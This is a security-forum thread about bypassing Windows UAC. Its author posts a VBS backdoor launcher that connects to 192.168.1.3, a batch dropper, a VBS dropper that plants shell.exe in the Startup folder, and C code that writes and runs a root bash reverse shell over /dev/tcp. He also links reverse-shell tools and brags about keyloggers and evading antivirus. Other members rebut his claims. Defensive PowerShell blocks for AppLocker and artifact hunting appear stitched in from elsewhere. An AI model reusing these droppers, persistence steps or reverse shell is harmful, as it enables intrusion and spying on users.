UAC Mode can be bypassed!

Status
Not open for further replies.

Nico@FMA

Level 27
Verified
May 11, 2013
1,687
I make my own exploits and stuff very cool!

Would it be ok to share a minor binary code to shut some people up?

Listen, I am not trying to discredit you, ok? But what you showed is running your exploit from the inside of the OS.
We all know that this will work for various known reasons.
I told you to do this from the outside and try to penetrate the system, while keeping in mind the scenario I posted earlier.
Now I ask you: how would you do that? Please, you want us to learn? Sure, then I ask you to write a step-by-step post on how you are going to penetrate a system and then use your exploit, etc.

Remember? I did challenge you... so make us learn.
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
I'm not uploading the files, but you might like some code?

Code:
' Backdoor Shellcode - created by (BlackBox) Hacker
' Written on 09/05/2014
' Compiled with the VbsEdit Program

Dim shell
' // Bypassing UAC using asInvoker!
Set payload = WScript.CreateObject("WScript.Shell")
shell = "cmd /c"
payload.run shell & "C:\Windows\temp\bd.dll 192.168.1.3 1000", 0, True

I have made a more silent way to infect a PC through UAC Mode! First you need a shell.exe, the code for which is shown above; then I make a dropper file for it! You will then make a dropper file and add the FUD & EXE Joiner Exploit Batch Script I have made!

Code:
:: // FUD & EXE Joiner Exploit Batch Script! - by (BackBox) Grey Hat Hacker
:: Created on 18/02/2014
:: Compiled with "Bat_To_Exe_Converter.exe" Compiler
@echo off
Game.exe
set Sleeping=%1
echo waiting %Sleeping% s
echo WScript.sleep %wait%5000 ' // SLEEP for five seconds zzZ > Sleeping.vbs
Sleeping.vbs
dropper.exe
::
:: Don't forget to add your ISO Image...
::

Now all you need is the Spyware file and the dropper file; note: make sure you add all the files to the Bat_To_Exe_Converter software!



Someone else's source code is here, but this will not work as well as my exploit, because of the buffer overflow and the built-in keylogger, for example shellcode like this!
Code:
payload.run shell & "C:\Windows\temp\bd.dll 192.168.1.3 1000", 0, True

http://www.rohitab.com/discuss/topic/27868-remote-shell/




Code with missing chunks of code!

Code:
' Trojan Dropper Shellcode - created by (BlackBox) Hacker
' Written on 17/05/2014
' Compiled with the VbsEdit Program

Dim fso, network, autorun_1, autorun_2
' // Bypassing UAC using asInvoker!
Set fso = CreateObject("Scripting.FileSystemObject")
Set autorun_1 = fso.GetFile("bd.dll")
Set autorun_2 = fso.GetFile("shell.exe")
autorun_1.copy ("C:\Windows\temp\bd.dll")
autorun_2.copy ("C:\Users\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe")

This is my Linux version; it works very well and also bypassed the UAC for the Linux Mint Operating System. I programmed it a few years back now!

Code:
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
* Backdoor.c
* Copyright (C) 2014 (BlackBox) Grey Hat Hacker <ade@PC-U180>
*
* Revers_Shell_Exploit is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Revers_Shell_Exploit is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
* Exploit compiled with Anjuta Compiler!!!
*
*/

#include <stdio.h>
int main()
{
FILE *fp;
char* str = "string";
int x = 10;
fp=fopen("/tmp/Update.sh", "w");
if(fp == NULL)
exit(-1);
fprintf(fp, "#!/bin/bash\n");
fprintf(fp, "exec 5<>/dev/tcp/127.0.0.1/1000\n");
fprintf(fp, "cat <&5 | while read line; do $line 2>&5 >&5; done\n");
fclose(fp);
system("gksu -u root /bin/bash /tmp/Update.sh");
system("rm /tmp/Update.sh");
return (0);
}


 

illumination

Would it be ok to share a minor binary code to shut some people up?
I want to see you post, like I said so many comments ago, a video of you testing this on a limited-rights account as well as a remote system on your network, or better yet another network. Once I have seen these, I will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough.
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
Most users will use the UAC on Administrator, which acts as a limited user already, unless you disable UAC Mode, so the new Windows 8 Pro is perfect for the job, as well as Windows 7. I have done loads of hacking videos on YouTube before, but I don't do them anymore. I've been banned that many times and stuff on many sites! I can share some cool code that you might like?

I've helped this person bypass Antivirus!



All of my videos are deleted from my channel; I only do security on YouTube now, sorry!

I want to see you post, like I said so many comments ago, a video of you testing this on a limited-rights account as well as a remote system on your network, or better yet another network. Once I have seen these, I will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough.
 

Littlebits

Retired Staff
May 3, 2011
3,893
WOW, what an expert... not. I bet you don't test security much?
Why do I need to run tests that require Admin rights on local systems? It proves nothing at all, period.

Any beginner hacker can exploit their own system with Admin rights. Sure, I can also write scripts and exploits that will work on a local system with Admin rights, but what's the point? Nothing will be run on my local system without my approval, which makes these tests obsolete. And like others have already mentioned, it's not your scripts or hacking skills that work on local systems with Admin rights; it is the users' own ignorance that makes them successful.

Enjoy!! :D
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
Well, hackers want access over computers to get Facebook passwords etc.; that's the point. If you're not interested, well, this would sound very boring indeed! Is it also very interesting what security stops cyber criminals as such for a home user, including UAC, recommended by Steve Gibson, security researcher? I'm also a Security Researcher as well as an Ethical Gray Hat Hacker or Computer Scientist releasing a Firewall Controller!


Why do I need to run tests that require Admin rights on local systems? It proves nothing at all, period.

Any beginner hacker can exploit their own system with Admin rights. Sure, I can also write scripts and exploits that will work on a local system with Admin rights, but what's the point? Nothing will be run on my local system without my approval, which makes these tests obsolete. And like others have already mentioned, it's not your scripts or hacking skills that work on local systems with Admin rights; it is the users' own ignorance that makes them successful.

Enjoy!! :D

I will uninstall Spy Shelter and fix my security flaws when I definitely install Comodo Antivirus, and yes, I know it's like spamming, but I use this nevertheless: Windows Firewall Console, the newer version! So the verdict on this topic is that Comodo Antivirus and AppLocker do very well on blocking and can be used instead of UAC!
 

Littlebits

Retired Staff
May 3, 2011
3,893
Well, hackers want access over computers to get Facebook passwords etc.; that's the point. If you're not interested, well, this would sound very boring indeed! Is it also very interesting what security stops cyber criminals as such for a home user, including UAC, recommended by Steve Gibson, security researcher? I'm also a Security Researcher as well as an Ethical Gray Hat Hacker or Computer Scientist releasing a Firewall Controller!

I already know what security actions stop cyber criminals:
1. The user's own actions, when downloading and running files and at UAC prompts. (No security product will protect against everything; no need to test them all, because at least one product will fail on each test, if not more.)
2. Keeping Windows and your software updated to protect against exploits and hacks.
3. Use a router-based hardware firewall.
4. If you are a novice user, then use a "Limited User Account" to do your normal activities.
5. Password your Admin account against unauthorized users and never give out your password.

You have to understand there are two types of security products: the ones that are user-friendly and work well if used with common sense (cautious user actions and safe downloading skills); the other types are made to pass tests, are not user-friendly, block many safe processes and still require advanced user actions to be successful.

Enjoy!! :D
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
That's a very good list, but did you know installing updates can also exploit the computer? Using .NET Framework 4.0 and Java is very bad!

I already know what security actions stop cyber criminals:
1. The user's own actions, when downloading and running files and at UAC prompts. (No security product will protect against everything; no need to test them all, because at least one product will fail on each test, if not more.)
2. Keeping Windows and your software updated to protect against exploits and hacks.
3. Use a router-based hardware firewall.
4. If you are a novice user, then use a "Limited User Account" to do your normal activities.
5. Password your Admin account against unauthorized users and never give out your password.

You have to understand there are two types of security products: the ones that are user-friendly and work well if used with common sense (cautious user actions and safe downloading skills); the other types are made to pass tests, are not user-friendly, block many safe processes and still require advanced user actions to be successful.

Enjoy!! :D

I have changed my mind; I'm thinking very geeky now, since I have a 500 MB data usage cap per day. I will use Microsoft Security Essentials and AppLocker for the zero-day threats!


Now to set up AppLocker on my PC!


First start the AppLocker process!



You can use any remote terminal and execute these commands remotely for AppLocker security without DCs (Domain Controllers), just on any small network, using either Ncat or Telnet, or maybe your own computer backdoor without user authentication. First open a command prompt or shell and type the following inputs! But anybody with the basic starter Windows version will not get the extra security such as AppLocker!

Code:
powershell
Import-Module AppLocker
Get-Command *AppLocker*
Get-AppLockerFileInformation -EventLog -EventType Denied -Statistics
# fill in the path of the file(s) to build rules from
Get-AppLockerFileInformation -Path "" | New-AppLockerPolicy -Optimize | Set-AppLockerPolicy -Merge

Make sure you use the merge in the command, otherwise you will lock yourself out of your own computer system!

Use the default rules now and add your applications later! This will set policies for your file signatures and your MD5 hashes! Now this is much better than Comodo: less download usage, and less RAM plus CPU usage as well.
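As an added example, not the commands from the post, here is the same build-and-merge step with a dry run in front of it, so the lock-out the post warns about is caught before anything is enforced. It assumes an elevated PowerShell on an edition that ships AppLocker, a trusted directory of C:\Program Files and the Everyone group; the locations it checks are the ones the dropper described earlier in the thread writes to.

```powershell
# Added example, not the thread's own commands. Run in an elevated PowerShell on an
# edition that ships AppLocker (the basic editions mentioned above do not have it).
Import-Module AppLocker

# Directory whose contents become the allow-list (assumption: point it at your own software).
$trustedDir = 'C:\Program Files'
$candidate  = Join-Path $env:TEMP 'applocker-candidate.xml'

# 1. Build allow rules from the trusted directory: publisher rules where a file is
#    signed, hash rules (SHA-256 file hashes) where it is not. -Optimize merges duplicates.
Get-AppLockerFileInformation -Directory $trustedDir -Recurse -FileType Exe, Dll, Script |
    New-AppLockerPolicy -RuleType Publisher, Hash -User Everyone -Optimize -Xml |
    Out-File -FilePath $candidate -Encoding UTF8

# 2. Files to dry-run: whatever sits in the two locations the dropper in this thread
#    writes to, plus a Windows binary that must stay runnable as a control.
$checkDirs = @("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup", "$env:SystemRoot\temp")
$control   = "$env:SystemRoot\System32\cmd.exe"
$files = @(Get-ChildItem -Path $checkDirs -Include *.exe, *.dll, *.vbs -Recurse -File -ErrorAction SilentlyContinue |
           Select-Object -ExpandProperty FullName) + $control

# 3. The candidate alone contains no rule for Windows itself, so the control comes
#    back DeniedByDefault: this is exactly the policy that locks you out if it is
#    applied with Set-AppLockerPolicy WITHOUT -Merge (no -Merge replaces the whole policy).
Test-AppLockerPolicy -XmlPolicy $candidate -Path $files -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# 4. The rules already in force (the default rules created in the GUI) must allow the
#    control; only then is merging the allow-list on top of them safe.
$effective = Get-AppLockerPolicy -Effective
$verdict   = Test-AppLockerPolicy -PolicyObject $effective -Path $control -User Everyone
if ($verdict.PolicyDecision -ne 'Allowed') {
    throw "Effective policy does not allow $control; create the default rules first."
}
Set-AppLockerPolicy -XmlPolicy $candidate -Merge

# 5. Enforcement needs the Application Identity service; then review what was denied.
Start-Service AppIDSvc
Get-AppLockerFileInformation -EventLog -EventType Denied -Statistics
```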

Layer 1 Applocker blocks the executable files
Layer 2 Antivirus detects your Malware for removal
Layer 3 Windows Two Way Firewall - Windows Firewall Console
Layer 4 MAC Spoofing (Optional)
Layer 5 ARP Spoofing (Optional)
Layer 6 Mifi Router - NAT protection
Layer 7 Web Proxy (Optional)
Layer 8 VPN Servers (Optional)

Testing the fun stuff, check this out!



Well, hard drive access is blocked etc.



And this was the UAC Spyware or exploit!
 

Nico@FMA

Level 27
Verified
May 11, 2013
1,687
@(BlackBox) Hacker

I want to see you post, like I said so many comments ago, a video of you testing this on a limited-rights account as well as a remote system on your network, or better yet another network. Once I have seen these, I will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough.

Why do I need to run tests that require Admin rights on local systems? It proves nothing at all, period.

Any beginner hacker can exploit their own system with Admin rights. Sure, I can also write scripts and exploits that will work on a local system with Admin rights, but what's the point? Nothing will be run on my local system without my approval, which makes these tests obsolete. And like others have already mentioned, it's not your scripts or hacking skills that work on local systems with Admin rights; it is the users' own ignorance that makes them successful.

Enjoy!! :D

Did you pay any attention to what Littlebits and Illumination said? Or to what I asked some posts back?
You can hack your local system all you want and yes, it's working, DUHHH.
Now try to do that on a remote system.... remember the scenario I posted to you? It will not work.
What does it take to make you understand? A sledgehammer? <facepalm>
All these screenshots and bla bla posts mean nothing.

SO LET ME CHALLENGE YOU AGAIN: SHOW US A VIDEO WHERE YOU PENETRATE A REMOTE SYSTEM USING THE SCENARIO I MENTIONED EARLIER.

Till that moment please stop posting nonsense as everyone here knows you are WRONG.

@ Admin or moderator: Please confirm what i just said.
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
Using AppLocker with PowerShell commands!



Did you read what I said in one of my posts? That I don't upload hacking videos on YouTube anymore; plus the videos you want to see have been deleted from my channel, sorry. I would have to set up two computers with VNC to capture the UAC being bypassed as well! And I only have a netbook I'm using and a virtual PC which is called "LAB"; that too is also on my netbook as well.

@(BlackBox) Hacker

Did you pay any attention to what Littlebits and Illumination said? Or to what I asked some posts back?
You can hack your local system all you want and yes, it's working, DUHHH.
Now try to do that on a remote system.... remember the scenario I posted to you? It will not work.
What does it take to make you understand? A sledgehammer? <facepalm>
All these screenshots and bla bla posts mean nothing.

SO LET ME CHALLENGE YOU AGAIN: SHOW US A VIDEO WHERE YOU PENETRATE A REMOTE SYSTEM USING THE SCENARIO I MENTIONED EARLIER.

Till that moment please stop posting nonsense as everyone here knows you are WRONG.

@ Admin or moderator: Please confirm what i just said.
 

Nico@FMA

Level 27
Verified
May 11, 2013
1,687
Did you read what I said in one of my posts? That I don't upload hacking videos on YouTube anymore; plus the videos you want to see have been deleted from my channel, sorry. I would have to set up two computers with VNC to capture the UAC being bypassed as well! And I only have a netbook I'm using and a virtual PC which is called "LAB"; that too is also on my netbook as well.

Pfff no comment the challenge stands as it is.
 


(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
Bypassing UAC Video!



This video doesn't show my old exploit, not just the code execution, but the newer exploit as a Trojan dropper file infecting the computer and then code execution of spyware through UAC Mode. Also, one of my downloaded executable files just bypassed it as well; the file was an unsigned application. Now every time your PC restarts the connection is made and the keylogger is running!

Dropped files:
C:\Windows\temp\bd.dll
C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shell.exe

Created files:
C:\Windows\temp\porn.jpg

I really like making my own exploits, but if you find it very hard to use, you can also use Metasploit as well in the same way!

Downloads here!
https://www.trustedsec.com/downloads/tools-download/

Links:
http://www.phillips321.co.uk/2013/10/22/one-line-python-meterpreter-reverse-shell/

Basic users' stuff!
http://www.fastandeasyhacking.com/




Thank you for your post, I hope you like the video!

K good luck mate, waiting for ur interesting video :)
 
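The two artifacts that post lists (a file under C:\Windows\temp and a Shell.exe in the user's Startup folder, reconnecting on every restart) are what a defender would go looking for. The script below is an added example, not code from the thread: it reports executables in those locations that carry no valid Authenticode signature, and any established TCP connection owned by a process running from them. Windows 8 or later with Windows PowerShell 4.0 is assumed.

```powershell
# Added example, not the thread's own code. Assumes Windows 8 or later with Windows
# PowerShell 4.0+ (Get-FileHash, Get-NetTCPConnection); run as the user being checked.
$DropLocations = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",     # per-user Startup folder
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp", # all-users Startup folder
    "$env:SystemRoot\temp"                                             # C:\Windows\temp
)

# Every executable-type file in the drop locations that does not carry a valid
# Authenticode signature, with the SHA-256 hash you would hand to the AV vendor.
function Get-UnsignedDroppedFiles {
    param([string[]]$Directories = $DropLocations)
    $dirs = $Directories | Where-Object { Test-Path $_ }
    if (-not $dirs) { return }
    Get-ChildItem -Path $dirs -Include *.exe, *.dll, *.vbs, *.bat, *.cmd -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path    = $_.FullName
                Status  = $sig.Status                      # Valid, NotSigned, HashMismatch, ...
                Signer  = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
                Sha256  = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
                Created = $_.CreationTime
            }
        } |
        Where-Object { $_.Status -ne 'Valid' }
}

# Established TCP connections owned by a process whose image lives in a drop location:
# the "connection is made at every restart" behaviour described above, seen from the host.
# (A .vbs started by wscript.exe shows wscript's path, not the script's, so it is not caught here.)
function Get-ConnectionsFromDropLocations {
    param([string[]]$Directories = $DropLocations)
    $procs = Get-CimInstance -ClassName Win32_Process | Where-Object {
        $path = $_.ExecutablePath
        $path -and ($Directories | Where-Object { $path -like "$_\*" })
    }
    foreach ($p in $procs) {
        Get-NetTCPConnection -OwningProcess $p.ProcessId -State Established -ErrorAction SilentlyContinue |
            Select-Object @{ n = 'Process'; e = { $p.ExecutablePath } },
                          @{ n = 'Pid';     e = { $p.ProcessId } },
                          RemoteAddress, RemotePort, LocalPort
    }
}

Get-UnsignedDroppedFiles         | Format-Table -AutoSize
Get-ConnectionsFromDropLocations | Format-Table -AutoSize
```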

Littlebits

Retired Staff
May 3, 2011
3,893
Bypassing UAC Video!



This video doesn't show my old exploit, not just the code execution, but the newer exploit as a Trojan dropper file infecting the computer and then code execution of spyware through UAC Mode. Also, one of my downloaded executable files just bypassed it as well; the file was an unsigned application. Now every time your PC restarts the connection is made and the keylogger is running!

Dropped files:
C:\Windows\temp\bd.dll
C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shell.exe

Created files:
C:\Windows\temp\porn.jpg

I really like making my own exploits, but if you find it very hard, use Metasploit? You can also use that as well in the same way!

Thank you for your post, I hope you like the video!


Still not what we were expecting; this is just a hack run on a local admin account. Try the same on a limited user account or a remote system.

There are tons of videos that show hacking tools used to exploit the system, but they never work unless the user running on an admin account manually downloads them and manually runs them.

Thanks. :D
 

Nico@FMA

Level 27
Verified
May 11, 2013
1,687
Well this works very nice, the video is coming very soon!


So you are finally going to make a video where you penetrate a REMOTE Windows OS that:
1: Is totally updated and configured.
2: DEP is on.
3: UAC is on.
4: Internet Security Software + firewall enabled.
5: Third-party software updated.
6: Is connected through a network with a hardware-based firewall?
7: And you are using STRICTLY your exploit and nothing else to penetrate the system.
8: And most importantly, has NOT been changed to allow your programs to work?

If any of these conditions fail, this would mean your video is worthless.
Again, I respect your knowledge when it comes to exploits; some of the things you said are valid and spot on, and I will be the first to admit that UAC can be bypassed both internally and externally. However, to achieve this, MANY things have happened before this would be possible in the first place.
The point I am trying to make is simple: a standard Windows using the config I have mentioned will not allow your exploit to change the UAC without warning, logging or even blocking it. (This includes internet security and all other standard protection.)
Obviously ANY PC can be infected if the user is click-happy, but if the user is paying attention to his PC then your exploit will fail. (And no, I am not talking about governmental exploits and other high-level crap.)
And this is the point me and many others were trying to make.
Yesterday you did dodge most of the questions and made silly comments about all kinds of stuff; let's forget that and just go from here.
Get me the video and I will be impressed and you have made your point (and I will stand corrected if so). But if not, then obviously you owe us a BIG sorry, as we tried to explain this to you.

How does that sound?
Cheers

@Littlebits
Totally correct m8.
 

(BlackBox) Hacker

Level 2
Thread author
Verified
Apr 21, 2014
179
I'm not the only one who has to prove stuff? This sounds like a load of rubbish! You make a video bypassing the UAC now, if you can? And it must be your own client; you can't use Metasploit. See how you like it?

Still not what we were expecting; this is just a hack run on a local admin account. Try the same on a limited user account or a remote system.

There are tons of videos that show hacking tools used to exploit the system, but they never work unless the user running on an admin account manually downloads them and manually runs them.

Thanks. :D
So you are finally going to make a video where you penetrate a REMOTE Windows OS that:
1: Is totally updated and configured.
2: DEP is on.
3: UAC is on.
4: Internet Security Software + firewall enabled.
5: Third-party software updated.
6: Is connected through a network with a hardware-based firewall?
7: And you are using STRICTLY your exploit and nothing else to penetrate the system.
8: And most importantly, has NOT been changed to allow your programs to work?

If any of these conditions fail, this would mean your video is worthless.
Again, I respect your knowledge when it comes to exploits; some of the things you said are valid and spot on, and I will be the first to admit that UAC can be bypassed both internally and externally. However, to achieve this, MANY things have happened before this would be possible in the first place.
The point I am trying to make is simple: a standard Windows using the config I have mentioned will not allow your exploit to change the UAC without warning, logging or even blocking it. (This includes internet security and all other standard protection.)
Obviously ANY PC can be infected if the user is click-happy, but if the user is paying attention to his PC then your exploit will fail. (And no, I am not talking about governmental exploits and other high-level crap.)
And this is the point me and many others were trying to make.
Yesterday you did dodge most of the questions and made silly comments about all kinds of stuff; let's forget that and just go from here.
Get me the video and I will be impressed and you have made your point (and I will stand corrected if so). But if not, then obviously you owe us a BIG sorry, as we tried to explain this to you.

How does that sound?
Cheers

@Littlebits
Totally correct m8.

Yep this requires no response!!!

Still not what we were expecting; this is just a hack run on a local admin account. Try the same on a limited user account or a remote system.

There are tons of videos that show hacking tools used to exploit the system, but they never work unless the user running on an admin account manually downloads them and manually runs them.

Thanks. :D
 

illumination

I'm not the only one who has to prove stuff? This sounds like a load of rubbish! You make a video bypassing the UAC now, if you can? And it must be your own client; you can't use Metasploit. See how you like it?

You are the one claiming the UAC and default security on a system can not protect users, but so far all you have shown us is the ability to infect and penetrate your own system with Admin rights. Show us that a normal system can be attacked with this method by remoting one in a video. Do not forget to use tools like Fiddler Web Debugger, or Wireshark, so we can view the connections being made from the targeted system to yours.
 